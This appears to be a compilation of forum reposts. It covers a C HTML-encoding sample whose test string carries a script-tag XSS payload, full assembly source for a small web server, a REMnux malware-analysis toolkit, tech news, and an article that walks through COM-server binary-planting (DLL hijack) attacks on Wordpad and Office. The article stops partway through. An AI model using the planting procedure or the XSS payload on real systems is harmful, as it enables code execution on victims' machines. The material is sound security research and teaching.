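    dst[n] = '\0';
    return (int)n;
}

char encoded[512];   /* output buffer shared with callers */

int main(void)
{
    /* Constructed sample: a script tag and a link inside what should be a display name. */
    const char *name = "Western Union <script>alert('x')</script> http://a/b";
    if (html_encode(name, encoded, sizeof encoded) >= 0)
        printf("%s\n", encoded);
    return 0;
}
```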
  14. Microsoft Mathematics 4.0

Brief Description: Microsoft Mathematics provides a graphing calculator that plots in 2D and 3D, step-by-step equation solving, and useful tools to help students with math and science studies.

Overview: Microsoft Mathematics provides a set of mathematical tools that help students get school work done quickly and easily. With Microsoft Mathematics, students can learn to solve equations step-by-step while gaining a better understanding of fundamental concepts in pre-algebra, algebra, trigonometry, physics, chemistry, and calculus. Microsoft Mathematics includes a full-featured graphing calculator that's designed to work just like a handheld calculator. Additional math tools help you evaluate triangles, convert from one system of units to another, and solve systems of equations.

Download: http://www.microsoft.com/downloads/en/details.aspx?FamilyID=9caca722-5235-401c-8d3f-9e242b794c3a

I found it by accident. I like it: it solves integrals and equations, you can draw graphs and lots of other things. Even if you do not like mathematics you might find it useful; it also explains step by step how some problems are solved.
  15. Cinchy Assembly Web Server

An efficient and simple web server written in x86 (by sterling stuart stein (s³))

A web server written in x86 assembly language. It includes only basic functions: it responds to GET requests and supports file download. A very good example of code.

Read more: Cinchy Assembly Web Server - An efficient and simple web server written in x86

Cinchy server
Main program by: S³ <scubed@frontiernet.net>
Ext routine by: r.c. volgers <r.volgers@hccnet.nl>
Bug reports by:
  Juvenile Delinquent <nervgaz@nervgaz.net> - Buffer overflow
  Jonathan Donitz <jon_donitz@hotmail.com> - 64k cut-off and forgot to reset buffer size
Special thanks to:
  Iczelion <iczelion@galaxycorp.com> for making it Windows 2000 compatible!
  SpaceCommander / ByTeGeiZ <SpaceCommander@ByTeGeiZ.de> for information about the directory browse dialog and long file names and for telling me that ".." worked in the URL.

Other additions:
  Makes sure that it is the GET command
  Can resume download (tested with Go!Zilla)
  If directory, will redirect to include /
  Recognizes %HH as hexadecimal
  Tells you your IP address and name

Please send me (S³) e-mail! I like getting responses!

How to use:
  Set up a directory for use by the server (for example: C:\WebPage)
  Run the program and click on "Pick Dir" and select your directory.
  Check the "Dir enabled" box if you want to allow directory viewing by clients, otherwise "dir/index.htm" will be used instead.
  If it is sending the file as the wrong type, use regedit and set/create a key in HKEY_CLASSES_ROOT of ".ext" (where ext is the file extension) to "Content Type" with the type (such as "application/x-zip-compressed")
  To access from another computer, type in your IP address or, over a LAN, the computer name.
.386
.model flat,stdcall
option casemap:none

WinMain   PROTO :DWORD,:DWORD,:DWORD,:DWORD ;Create dialog and handle msg
WndProc   PROTO :DWORD,:DWORD,:DWORD,:DWORD ;Main window function
Cut       PROTO :DWORD,:DWORD,:DWORD,:BYTE  ;Cut off end of string
StrLen    PROTO :DWORD                      ;Find length of string
StrCmp    PROTO :DWORD,:DWORD               ;Compare two strings
StrCpy    PROTO :DWORD,:DWORD               ;Copy a string
StrCat    PROTO :DWORD,:DWORD               ;String1+=String2
Ext       PROTO                             ;Find MIME type for extension
Resuming  PROTO                             ;Look for resume data
FillList  PROTO :DWORD,:DWORD               ;DIR into Listbox and send
RemoveHex PROTO :DWORD,:DWORD               ;Converts %HH to characters
InsertHex PROTO :DWORD,:DWORD               ;Converts characters to %HH
FromHex   PROTO :BYTE                       ;Converts hex digit to byte

include \masm32\include\windows.inc
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\shell32.inc
includelib \masm32\lib\shell32.lib
include \masm32\include\wsock32.inc
includelib \masm32\lib\wsock32.lib
include \masm32\include\advapi32.inc
includelib \masm32\lib\advapi32.lib

.data
ClassName db "DLGCLASS",0
DlgName   db "Form1",0
IcoName   db "i",0
DefPath   db "C:",0
DefName   db "index.htm",0
Star      db "*.*",0
DTitle    db "Select base webpage directory:",0
Get       db "GET",0
Content   db "Content Type",0
Msg200    db "HTTP/1.1 200 OK",13,10
          db "Expires: 0",13,10
          db "Last-Modified: 0",13,10
          db "Accept-Range: bytes",13,10
          db "Content-Type: %s",13,10
          db "Content-Length: %lu",13,10,13,10,0
Msg206    db "HTTP/1.1 206 Partial Content",13,10
          db "Expires: 0",13,10
          db "Last-Modified: 0",13,10
          db "Accept-Range: bytes",13,10
          db "Content-Type: %s",13,10
          db "Content-Range: bytes=%lu-%lu/%lu",13,10
          db "Content-Length: %lu",13,10,13,10,0
Msg404    db "HTTP/1.1 404 Not Found",13,10
          db "Expires: 0",13,10
          db "Last-Modified: 0",13,10
          db "Accept-Range: bytes",13,10
          db "Content-Type: text/html",13,10
          db "Content-Length: 124",13,10,13,10
          db "<TITLE>404 error</TITLE><B>Error 404: Page not found</B>",13,10
          db "The URL does not exist. Check the link and your spelling.",0
Redir     db "HTTP/1.1 301 Moved Permanently",13,10
          db "Location: %s",13,10,0
Range     db "range: bytes",0
Str0      db "<TITLE>Directory of ",0
Str1      db "</TITLE>",13,10,0
Str2      db "File:<BR><BR>",13,10,13,10,0
Str3      db 13,10,"<BR>Directory:<BR><BR>",13,10,13,10,0
Str4      db "<A HREF=",34,0
Str5      db 34,62,0
Str6      db "</A><BR>",13,10,0
HTML      db "text/html",0
Type0     db "text/plain",0
hFile     dd 0
hSock1    dd 0
hReg      dd 0
pType     dd 0
bi        BROWSEINFO <0,0,0,offset DTitle,BIF_RETURNONLYFSDIRS,0,0,0>

.data?
hInstance   HINSTANCE ?
CommandLine LPSTR ?
Count   dd ?
Exist   dd ?
FSize   dd ?
FOffset dd ?
RFlag   dd ?
hDlg    dd ?            ;Handles
hFind   dd ?
hMem    dd ?
pMem    dd ?
BufSize dd ?
NotUsed dd ?
RSBuf   db 1024 dup(?)  ;String buffers
Buf1    db 1024 dup(?)
Buf2    db 1024 dup(?)
Buf3    db 1024 dup(?)
Buf4    db 1024 dup(?)
Path    db 512 dup(?)
wsadata WSADATA <>      ;WinSock
SA      sockaddr_in <>
fd      WIN32_FIND_DATA <>

.const
WM_SOCKET equ WM_USER+256

.code
program:
    INVOKE GetModuleHandle,0
    mov hInstance,eax
    INVOKE GetCommandLine
    mov CommandLine,eax
    INVOKE WinMain,hInstance,0,CommandLine,SW_SHOWDEFAULT
    INVOKE ExitProcess,eax

WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
    LOCAL wc:WNDCLASSEX
    LOCAL msg:MSG
    mov wc.cbSize,SIZEOF WNDCLASSEX
    mov wc.style,CS_HREDRAW or CS_VREDRAW
    mov wc.lpfnWndProc,OFFSET WndProc
    mov wc.cbClsExtra,0
    mov wc.cbWndExtra,DLGWINDOWEXTRA
    push hInst
    pop wc.hInstance
    mov wc.hbrBackground,COLOR_BTNFACE+1
    mov wc.lpszClassName,OFFSET ClassName
    mov wc.lpszMenuName,0
    INVOKE LoadIcon,hInstance,offset IcoName
    mov wc.hIcon,eax
    mov wc.hIconSm,eax
    INVOKE LoadCursor,0,IDC_ARROW
    mov wc.hCursor,eax
    INVOKE WSAStartup,101h,offset wsadata   ;Use WinSock v1.1
    INVOKE RegisterClassEx,addr wc
    ;Make Dialog box.
    INVOKE CreateDialogParam,hInstance,offset DlgName,0,0,0
    mov hDlg,eax
    INVOKE ShowWindow,hDlg,SW_SHOWNORMAL
    INVOKE UpdateWindow,hDlg
    .WHILE TRUE                             ;Main window loop
        INVOKE GetMessage,addr msg,0,0,0
        .BREAK .IF (!eax)
        INVOKE TranslateMessage,addr msg
        INVOKE DispatchMessage,addr msg
    .ENDW
    INVOKE WSACleanup                       ;Done with WinSock
    mov eax,msg.wParam
    ret
WinMain endp

WndProc proc hWnd:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM
    .IF uMsg==WM_DESTROY
        INVOKE closesocket,hSock1
        INVOKE PostQuitMessage,0
    .ELSEIF uMsg==WM_SHOWWINDOW
        INVOKE SendDlgItemMessage,hWnd,1000,WM_SETTEXT,0,offset DefPath
        INVOKE gethostname,offset Buf1,1024 ;Get name
        INVOKE SendDlgItemMessage,hWnd,1004,WM_SETTEXT,0,offset Buf1
        INVOKE gethostbyname,addr Buf1
        mov eax,[eax+12]
        mov eax,[eax]                       ;Get IP address
        mov eax,[eax]
        INVOKE inet_ntoa,eax
        INVOKE SendDlgItemMessage,hWnd,1005,WM_SETTEXT,0,eax
        INVOKE socket,PF_INET,SOCK_STREAM,IPPROTO_TCP
        mov hSock1,eax                      ;Configure listening socket
        mov SA.sin_family,AF_INET
        mov SA.sin_addr.S_un.S_addr,INADDR_ANY
        INVOKE htons,80
        mov SA.sin_port,ax
        INVOKE WSAAsyncSelect,hSock1,hWnd,WM_SOCKET,FD_ACCEPT
        INVOKE bind,hSock1,offset SA,sizeof SA
        INVOKE listen,hSock1,5              ;Listen for connections
    .ELSEIF uMsg==WM_COMMAND
        mov eax,wParam
        .IF ax==1003
            mov Buf4,0                      ;Prompt for directory
            INVOKE SHBrowseForFolder,addr bi
            .IF eax==0
                xor eax,eax
                ret
            .ENDIF
            ;Turn return value into pathname
            INVOKE SHGetPathFromIDList,eax,offset Buf4
            .IF Buf4==0
                xor eax,eax
                ret
            .ENDIF
            .IF Buf4[3]==0                  ;If C:\ change to C:
                mov Buf4[2],0
            .ENDIF
            INVOKE StrLen,offset Buf4
            mov ecx,eax
            mov al,"\"
            mov edi,offset Buf4
        @@@5:
            repnz scasb
            jnz @@@6
            mov BYTE PTR[edi-1],"/"
            jmp @@@5
        @@@6:
            INVOKE SendDlgItemMessage,hWnd,1000,WM_SETTEXT,0,offset Buf4
        .ENDIF
    .ELSEIF uMsg==WM_SOCKET
        mov eax,lParam
        and eax,0FFFFh
        .IF ax==FD_ACCEPT
            INVOKE accept,hSock1,0,0
            INVOKE WSAAsyncSelect,eax,hWnd,WM_SOCKET,FD_READ or FD_CLOSE
        .ELSEIF ax==FD_READ
            INVOKE recv,wParam,offset RSBuf,1024,0
            mov al,32
            mov ecx,10
            lea edi,RSBuf
            repnz scasb
            dec edi
            push edi
            mov BYTE PTR[edi],0
            INVOKE StrCmp,offset RSBuf,offset Get
            .IF eax==1                      ;If command other than GET, ignore.
                INVOKE closesocket,wParam
                xor eax,eax
                ret
            .ENDIF
            pop edi
            mov BYTE PTR[edi],32
            INVOKE Cut,offset RSBuf,offset Buf2,4,32
            INVOKE RemoveHex,offset Buf2,offset Buf1
            INVOKE StrLen,offset Buf1
            mov ecx,eax
            mov edi,offset Buf1             ;Make sure there is no ../
            mov al,"."
        @@@7:
            repnz scasb
            jnz @@@8
            cmp BYTE PTR[edi],"."
            jnz @@@7
            cmp BYTE PTR[edi+1],"/"
            jnz @@@7
            jmp Bad
        @@@8:
            mov Exist,0                     ;Must determine request type
            dec edi
            .IF BYTE PTR[edi]=="/"          ;Therefore, directory
                INVOKE StrCpy,offset Buf1,offset Buf3
                INVOKE SendDlgItemMessage,hWnd,1000,WM_GETTEXT,512,offset Path
                INVOKE StrCpy,offset Path,offset Buf2
                INVOKE StrCat,offset Buf2,offset Buf1
                INVOKE SendDlgItemMessage,hDlg,1002,BM_GETCHECK,0,0
                .IF eax==0
                    INVOKE StrCat,offset Buf2,offset DefName
                    jmp Index
                .ENDIF
                INVOKE wsprintfA,offset Buf1,offset Msg200,offset HTML,30000
                INVOKE StrLen,offset Buf1
                INVOKE send,wParam,offset Buf1,eax,0 ;Send header
                INVOKE StrLen,offset Str0
                INVOKE send,wParam,offset Str0,eax,0
                INVOKE StrLen,offset Buf2
                INVOKE send,wParam,offset Buf2,eax,0
                INVOKE StrLen,offset Str1
                INVOKE send,wParam,offset Str1,eax,0
                INVOKE StrCat,offset Buf2,offset Star ;Get files
                INVOKE FillList,0,wParam
                INVOKE FillList,16,wParam
                INVOKE closesocket,wParam   ;Done sending listing
                inc Exist
            .ELSE                           ;File
                INVOKE SendDlgItemMessage,hWnd,1000,WM_GETTEXT,512,offset Path
                INVOKE StrCpy,offset Path,offset Buf2
                INVOKE StrCat,offset Buf2,offset Buf1
            Index:
                INVOKE GetFileAttributes,offset Buf2
                cmp eax,-1
                jz Bad                      ;File doesn't exist
                and eax,16
                .IF eax!=0                  ;File was actually a directory, without a /.
                    INVOKE InsertHex,offset Buf1,offset Buf2
                    INVOKE StrLen,offset Buf2
                    lea ebx,Buf2            ;So, redirect
                    add eax,ebx
                    mov BYTE PTR[eax],"/"
                    mov BYTE PTR[eax+1],0
                    INVOKE wsprintf,offset Buf1,offset Redir,offset Buf2
                    INVOKE StrLen,offset Buf1
                    INVOKE send,wParam,offset Buf1,eax,0
                    INVOKE closesocket,wParam
                    xor eax,eax
                    ret
                .ENDIF
                INVOKE CreateFile,offset Buf2,GENERIC_READ,0,0,OPEN_EXISTING,0,0
                mov hFile,eax
                INVOKE GetFileSize,hFile,0
                mov FSize,eax
                INVOKE Ext
                INVOKE Resuming             ;Check for range and if resume sending
                mov eax,FOffset
                .IF RFlag==0
                    INVOKE wsprintfA,offset Buf1,offset Msg200,pType,FSize
                .ELSE
                    mov ebx,FSize
                    sub FSize,eax
                    mov ecx,ebx
                    dec ecx
                    INVOKE wsprintfA,offset Buf1,offset Msg206,pType,FOffset,ecx,ebx,FSize
                .ENDIF
                INVOKE StrLen,offset Buf1
                INVOKE send,wParam,offset Buf1,eax,0
                INVOKE GlobalAlloc,0,FSize  ;Get memory to store file
                mov hMem,eax                ;for sending.
                INVOKE GlobalLock,hMem
                mov pMem,eax
                INVOKE SetFilePointer,hFile,FOffset,0,FILE_BEGIN
                INVOKE ReadFile,hFile,pMem,FSize,offset NotUsed,0
                INVOKE send,wParam,pMem,FSize,0
                INVOKE GlobalUnlock,hMem
                INVOKE GlobalFree,hMem
                INVOKE closesocket,wParam
                INVOKE CloseHandle,hFile    ;Done with file and socket too.
                inc Exist
            .ENDIF
            .IF Exist==0
            Bad:
                INVOKE StrLen,offset Msg404 ;Bad request. Send 404 error.
                INVOKE send,wParam,offset Msg404,eax,0
                INVOKE closesocket,wParam
            .ENDIF
        .ELSEIF ax==FD_CLOSE
            INVOKE closesocket,wParam
        .ENDIF
    .ELSE
        INVOKE DefWindowProc,hWnd,uMsg,wParam,lParam
        ret
    .ENDIF
    xor eax,eax
    ret
WndProc endp

Cut PROC SRC:DWORD,DST:DWORD,OS:DWORD,EC:BYTE
    mov eax,OS
    add SRC,eax
    mov al,EC
    mov ecx,-1
    mov edi,SRC
    repnz scasb
    not ecx
    dec ecx
    .IF ecx>1010                            ;Buffer overflow: Truncate (414)
        mov ecx,1020
    .ENDIF
    mov esi,SRC
    mov edi,DST
    rep movsb
    mov BYTE PTR[edi],0
    ret
Cut ENDP

StrLen PROC SRC:DWORD
    mov ecx,-1
    mov edi,SRC
    mov al,0
    repnz scasb
    mov eax,ecx
    not eax
    dec eax
    ret
StrLen ENDP

StrCpy proc SRC:LPSTR,DST:LPSTR
    INVOKE StrLen,SRC
    add eax,2
    mov ecx,eax
    mov esi,SRC
    mov edi,DST
    rep movsb
    ret
StrCpy endp

StrCat proc S1:DWORD,S2:DWORD
    INVOKE StrLen,S2
    add eax,2
    push eax
    INVOKE StrLen,S1
    mov edi,S1
    add edi,eax
    mov esi,S2
    pop ecx
    rep movsb
    ret
StrCat endp

StrCmp PROC SRC:DWORD,DST:DWORD
    INVOKE StrLen,SRC
    inc eax
    mov ecx,eax
    mov esi,SRC
    mov edi,DST
    repz cmpsb
    mov eax,1
    jnz Next                                ;zf set or not from repz
    dec eax
Next:
    ret
StrCmp endp

Ext PROC
    lea esi,Buf2
    mov ebx,esi
@0:
    lodsb                                   ;Search string for '.', ending at 0.
    .IF al=="."
        mov ebx,esi
    .ENDIF
    cmp al,0
    jnz @0
    dec ebx
    ;Open Registry to look for MIME type for extension.
    INVOKE RegOpenKeyEx,HKEY_CLASSES_ROOT,ebx,0,KEY_READ,offset hReg
    cmp eax,0
    jnz @1
    ;Get MIME type
    mov BufSize,1024
    INVOKE RegQueryValueEx,hReg,offset Content,0,0,offset Buf4,offset BufSize
    cmp eax,0
    jnz @1
    ;Done with Registry
    INVOKE RegCloseKey,hReg
    lea eax,Buf4
    mov pType,eax
    ret
@1:                                         ;If not found, return default.
    INVOKE RegCloseKey,hReg
    lea eax,Type0
    mov pType,eax
    ret
Ext ENDP

Resuming PROC                               ;Set FOffset
    mov FOffset,0
    mov RFlag,0
    lea esi,RSBuf
    lea edi,Range
@2:
    mov ch,[esi]
    .IF ch<91 && ch>64                      ;Lower case
        add ch,32
    .ENDIF
    .IF [edi]==ch                           ;Look for substring
        inc edi
        cmp BYTE PTR[edi],0
        jz @3
    .ELSE
        lea edi,Range
    .ENDIF
    inc esi
    cmp BYTE PTR[esi],0
    jnz @2
    ret
@3:
    add esi,2                               ;Turn string at [esi] into value in eax.
xor eax,eax ;Only works for "Range: bytes=x-" format xor ebx,ebx mov ecx,10 mov RFlag,1 @4: mov bl,[esi] sub bl,48 inc esi .IF bl<10 mul ecx add eax,ebx jmp @4 .ENDIF mov FOffset,eax ret Resuming ENDP FillList PROC DirF:DWORD,hSck:DWORD INVOKE SendDlgItemMessage,hDlg,1001,LB_RESETCONTENT,0,0 INVOKE FindFirstFile,offset Buf2,offset fd .IF eax==-1 ret .ENDIF mov hFind,eax @@@1: mov eax,fd.dwFileAttributes and eax,16 ;Show directories if DirF .IF eax==DirF xor eax,eax .IF fd.cFileName=="." .IF fd.cFileName[1]==0 || (fd.cFileName[1]=="." && fd.cFileName[2]==0) inc eax .ENDIF .ENDIF .IF eax==0 INVOKE SendDlgItemMessage,hDlg,1001,LB_ADDSTRING,0, offset fd.cFileName .ENDIF .ENDIF INVOKE FindNextFile,hFind,offset fd cmp eax,1 jz @@@1 INVOKE FindClose,hFind INVOKE SendDlgItemMessage,hDlg,1001,LB_GETCOUNT,0,0 .IF eax==0 ret .ENDIF mov Count,eax .IF DirF==16 lea edx,Str3 .ELSE lea edx,Str2 .ENDIF INVOKE StrLen,edx INVOKE send,hSck,edx,eax,0 mov pType,0 @@@2: INVOKE StrLen,offset Str4 ;Send hyperlink to file INVOKE send,hSck,offset Str4,eax,0 INVOKE SendDlgItemMessage,hDlg,1001,LB_GETTEXT,pType,offset Buf1 .IF DirF==16 ;Add / to directories mov edx,offset Buf1 INVOKE StrLen,edx add eax,edx mov BYTE PTR[eax],"/" inc eax mov BYTE PTR[eax],0 .ENDIF INVOKE InsertHex,offset Buf1,offset Buf3 INVOKE StrLen,offset Buf3 INVOKE send,hSck,offset Buf3,eax,0 INVOKE StrLen,offset Str5 INVOKE send,hSck,offset Str5,eax,0 INVOKE StrLen,offset Buf1 INVOKE send,hSck,offset Buf1,eax,0 INVOKE StrLen,offset Str6 INVOKE send,hSck,offset Str6,eax,0 inc pType mov eax,Count cmp pType,eax jnz @@@2 ret FillList ENDP RemoveHex PROC SRC:DWORD,DST:DWORD mov esi,SRC dec esi mov edi,DST xor eax,eax @@@3: inc esi mov al,[esi] .IF al=="\" mov al,"/" .ENDIF .IF al==0 stosb ret .ENDIF .IF al=="%" INVOKE FromHex,[esi+1] .IF al==-1 mov al,"%" stosb jmp @@@3 .ENDIF mov bl,al INVOKE FromHex,[esi+2] .IF al==-1 mov al,"%" stosb jmp @@@3 .ENDIF shl bl,4 add al,bl add esi,2 .ENDIF stosb jmp @@@3 RemoveHex ENDP InsertHex 
PROC SRC:DWORD,DST:DWORD mov esi,SRC dec esi mov edi,DST xor eax,eax @@@4: inc esi mov al,[esi] .IF al==0 stosb ret .ENDIF .IF al<"(" || al>"~" mov dl,al mov al,"%" stosb mov al,dl shr al,4 .IF al<10 add al,48 .ELSE add al,55 .ENDIF stosb mov al,dl and al,15 .IF al<10 add al,48 .ELSE add al,55 .ENDIF .ENDIF stosb jmp @@@4 InsertHex ENDP FromHex PROC Char:BYTE mov al,Char .IF al>="0" && al<="9" sub al,48 ret .ENDIF .IF al>="a" && al<="f" sub al,87 ret .ENDIF .IF al>="A" && al<="F" sub al,55 ret .ENDIF mov al,-1 ret FromHex ENDP end program (source site: http://lingcog.iit.edu/~scubed/projects.xml) Read more: http://www.intel-assembler.it/portale/5/cinchy-x86-web-server/a-basic-asm-web-server.asp#ixzz1ODJlDs1q Sursa: Cinchy Assembly Web Server - An efficient and simple web server written in x86
16. REMnux: A Linux Distribution for Reverse-Engineering Malware

REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software. The distribution is based on Ubuntu and is maintained by Lenny Zeltser.

About REMnux

REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that's listening on the appropriate ports.

REMnux is also useful for analyzing web-based malware, such as malicious JavaScript, Java programs, and Flash files. It also has tools for analyzing malicious documents, such as Microsoft Office and Adobe PDF files, and utilities for reversing malware through memory forensics. In these cases, malware may be loaded onto REMnux and analyzed directly on the REMnux system without requiring other systems to be present in the lab.

You can learn about malware analysis techniques that make use of the tools installed and pre-configured on REMnux by taking my course on Reverse-Engineering Malware (REM) at SANS Institute. Originally released in 2010, REMnux has been updated to version 2 in 2011.

What REMnux Is Not

REMnux isn't a fancy distribution that was built from scratch... In simple terms, it's a trimmed-down version of Ubuntu and has various useful malware tools set up on it.

REMnux does not aim to include all malware analysis tools in existence. Many of these tools are designed to work on Windows, and investigators prefer to use Windows systems for running such tools. If you are interested in running Windows analysis tools on a Linux platform, take a look at the Zero Wine project. If you are looking for a more full-featured Linux distribution focused on forensic analysis, take a look at SANS Investigative Forensic Toolkit (SIFT) Workstation.
Downloading REMnux

You can download the REMnux distribution as a VMware virtual appliance archive and also as an ISO image of a Live CD. MD5 hash values of the latest files are:

VMware virtual appliance archive: remnux-vm-public-2.0.zip (MD5 hash A9AD4B6F85E89A5E20A5FB1E8E18A49A).
ISO image of a Live CD: remnux-public-2.0-live-cd.iso (MD5 hash CD30284948A1160C2ADD6FD07D4349FA).

Questions on and Improvements to REMnux

Do you have recommendations for making REMnux more useful? If so, please let me know. You can contact me via email through my website or via Twitter. You're welcome to get in touch with me if you have questions regarding using REMnux. Another, and sometimes faster, option is to use the REMnux discussion forum on SourceForge.

Malware Analysis Tools Set Up On REMnux

Analyzing Flash malware: swftools, flasm, flare, RABCDAsm
Analyzing IRC bots: IRC server (Inspire IRCd) and clients (Irssi, ircII). To launch the IRC server, type "ircd start"; to shut it down "ircd stop". To launch the IRC client, type "irc".
Network-monitoring and interactions: Wireshark, Honeyd, INetSim, fakedns and fakesmtp scripts, NetCat
JavaScript deobfuscation: Firefox with Firebug, NoScript and JavaScript Deobfuscator extensions, Rhino debugger, two versions of patched SpiderMonkey, Windows Script Decoder, Jsunpack-n
Interacting with web malware: TinyHTTPd, Paros proxy, Burp Suite Free Edition, stunnel, VirusTotal VTzilla, User Agent Switcher, Tor and torsocks (with "usewithtor"). To launch the Tor daemon, type "tor start"; to shut it down "tor stop".
Analyzing shellcode: gdb, objdump, Radare (hex editor+disassembler), shellcode2exe, libemu with "sctest", diStorm disassembler library
Dealing with suspicious files: upx, packerid, bytehist, xorsearch, TRiD, xortools.py, ClamAV, ssdeep, md5deep, pescanner.py
Malicious document file analysis: Didier's PDF tools, Origami framework, Jsunpack-n, pdftk, pyOLEScanner.py
Memory forensics: Volatility Framework with malware.py, AESKeyFinder and RSAKeyFinder.
Miscellaneous: unzip, strings, feh image viewer, SciTE text editor, OpenSSH server, VBinDiff file comparison/viewer.

Sursa si detalii: REMnux: A Linux Distribution for Reverse-Engineering Malware
17. begood is a moderator. There are plans for other people too, but for now, at least for a few days, the list will stay as it is. Then we'll see, depending on how the "pending" people post.
18. MySQL 5.5: Storage Engine Performance Benchmark for MyISAM and InnoDB

Starting with MySQL v5.5, InnoDB is the default database engine. A lot of work has gone into it and it has been improved considerably. One important thing is that InnoDB respects the ACID properties (atomicity, consistency, isolation, durability), which ensures that transactions are processed as they should be; for example, there is crash recovery. Work has also been done on the "Windows side", meaning optimizations for Windows: native Windows functions are used, for example for memory allocation or other things, which means extra speed. The InnoDB configuration settings let you select how many threads are used, how many for reading and how many for writing, and let you use memory allocators specific to the operating system... Other differences: InnoDB has Foreign Key support (important) and locks at the cell level rather than the table level, but MyISAM supports full-text search indexes. In practice, InnoDB is faster.
19. Linux Kernel Moves to 3.0 For No Reason

Numbers are Just Numbers and in the Linux Kernel they Mean Nothing

By Stephen Spector on Wed, 06/01/11 - 3:18pm.

This past Monday Linus Torvalds released the first release candidate (-rc) of the next kernel series, which was expected to be 2.6.40, but instead renamed it to Linux 3.0 kernel. From Linus’ commit statement (http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=55922c9d1b84b89cb946c777fddccb3247e7df2c):

.. except there are various scripts that really know that there are three numbers, so it calls itself "3.0.0-rc1". Hopefully by the time the final 3.0 is out, we'll have that extra zero all figured out.

So, what does this mean? Are there significant new features in 3.0 that justify a numbering switch from 2.6.40 to 3.0? To find out more, we can read Linus’ mail to the kernel mailing list (https://lkml.org/lkml/2011/5/29/204):

I decided to just bite the bullet, and call the next version 3.0. It will get released close enough to the 20-year mark, which is excuse enough for me, although honestly, the real reason is just that I can no longer comfortably count as high as 40. The whole renumbering was discussed at last year's Kernel Summit, and there was a plan to take it up this year too. But let's face it - what's the point of being in charge if you can't pick the bike shed color without holding a referendum on it? So I'm just going all alpha-male, and just renumbering it. You'll like it. Now, my alpha-maleness sadly does not actually extend to all the scripts and Makefile rules, so the kernel is fighting back, and is calling itself 3.0.0-rc1. We'll have the usual 6-7 weeks to wrestle it into submission, and get scripts etc cleaned up, and the final release should be just "3.0". The -stable team can use the third number for their versioning.

In fact, Linus goes on to say the number change is not based on anything from a feature standpoint; it’s just a number change.
This type of change is most interesting as it goes against standard practices with software numbering conventions and once again shows Linus as a leader in the software space with his willingness to defy conventional wisdom. I find this change interesting but am not really sure how it impacts anyone. The kernel used in most distributions is always listed but I believe that most users look for the latest version of any distro and will go with whatever kernel they use, regardless of numbering scheme. However, with a numbering scheme not based on any standard, could we see companies in the future release version 22.0 as an initial product causing people not aware that this is the 22nd iteration and therefore better than version 1.0? I’m sure a marketing person somewhere is contemplating this. What do you think? Is Linus simply changing the number for no reason as he states? Is there a grand conspiracy behind this change that no one knows about? Perhaps Microsoft is behind this change and is now controlling Linus’ mind. Sursa: Open Source Exposed: Linux Kernel Moves to 3.0 For No Reason
20. The Anatomy of COM Server-Based Binary Planting Exploits

Tuesday, May 24, 2011

Last week at the Hack In The Box conference in Amsterdam we presented some techniques for advanced exploitation of binary planting bugs. The stage was set by our previous blog post where we described how unsafely registered COM server DLLs, as well as safely registered COM server DLLs that make unsafe binary loading calls, could be abused for mounting binary planting attacks. This post reveals our work to the rest of the world.

The Magic Of Special Folders

One of the elements we used in our exploits were Windows special folders. Special folders are folders that can be shown by Windows Explorer but don't always behave like ordinary folders, which simply contain files and other folders. Some examples of special folders are Control Panel, My Computer, My Documents, Administrative Tools and Printers. Every one of these special folders is implemented as an in-process COM server with a specific class identifier (CLSID). For instance, the CLSID of My Computer is {20D04FE0-3AEA-1069-A2D8-08002B30309D}.

Let's begin with a small magic trick (works on XP, Vista and Windows 7): Create a new empty folder anywhere on your file system and rename it to folder.{20D04FE0-3AEA-1069-A2D8-08002B30309D}. (Note that the CLSID must be the extension of the folder name, i.e., must come after the final dot.) Immediately after renaming, the folder's icon will be changed to the icon of My Computer and, moreover, opening the folder will actually show the My Computer content.

Apart from having an obvious entertaining value, this trick also plays an important role in our exploits. Many applications, when processing files from special folders or displaying the content of special folders, trigger the instantiation of such folders' COM servers based on the CLSIDs in their extensions. Which brings us to the first exploit.
Double-Click Attack 1: Wordpad on Windows XP

As already mentioned in our stage-setting blog post, all Windows XP installations have a registered COM server called "Display Panning CPL Extension" with CLSID {42071714-76d4-11d1-8b24-00a0c9068ff3}, implemented by a non-existing deskpan.dll. Consequently, if some application decided to instantiate such COM server, this would result in loading deskpan.dll from the current working directory. As you might have guessed, the special folders magic can make an application instantiate just any registered COM server. Let's do this with Wordpad. The video below shows the following procedure:

create a "malicious" deskpan.dll;
create a new folder and rename it to files.{42071714-76d4-11d1-8b24-00a0c9068ff3} - note that Windows XP hides the folder extension, and that this special folder still behaves like an ordinary folder;
copy the malicious deskpan.dll to the new folder;
open the folder;
create a new rich text document in the folder;
double-click the rich-text document.

http://www.youtube.com/watch?feature=player_embedded&v=SzW8xCsHOuY

After double-clicking the rich text document, Wordpad gets launched and its current working directory gets set to the special folder (which is the expected behavior). However, for reasons unknown to us, Wordpad then triggers a call to the COM server-instantiating function CoCreateInstance with the CLSID of our special folder. This causes a registry lookup for the COM server DLL (deskpan.dll), and then an attempt to load this DLL using a LoadLibrary call. Failing to find this DLL in Wordpad's home directory as well as in all Windows system folders, the "malicious" deskpan.dll is finally loaded from our special folder and executed.

Double-Click Attack 2: Applications on Windows 7

In contrast to Windows XP, a fresh installation of Windows 7 has no unsafely registered in-process COM servers. It does, however, have several safely registered COM servers whose DLLs make unsafe library loading calls.
(XP and Vista have such DLLs too.) One such case on Windows 7 is the COM server called "AnalogCable Class", registered with CLSID {2E095DD0-AF56-47E4-A099-EAC038DECC24} and having C:\Windows\System32\PsisDecd.dll as its DLL. When an application instantiates this COM server, the PsisDecd.dll is loaded from the System32 folder (which is okay), but this DLL quickly makes a call to LoadLibrary("ehTrace.dll"). Now it's not that ehTrace.dll doesn't exist on Windows 7: it does exist in folder C:\Windows\ehome - but applications launched outside this folder are unable to find it. This means that applications from folder C:\Windows\ehome, for instance ehshell.exe, can safely and successfully instantiate the said COM server, while other applications automatically become vulnerable if they try to do the same. The video shows the following procedure:

create a "malicious" ehTrace.dll;
create a new Microsoft Word 2010 document;
create a new Microsoft PowerPoint 2010 document;
create a new text document;
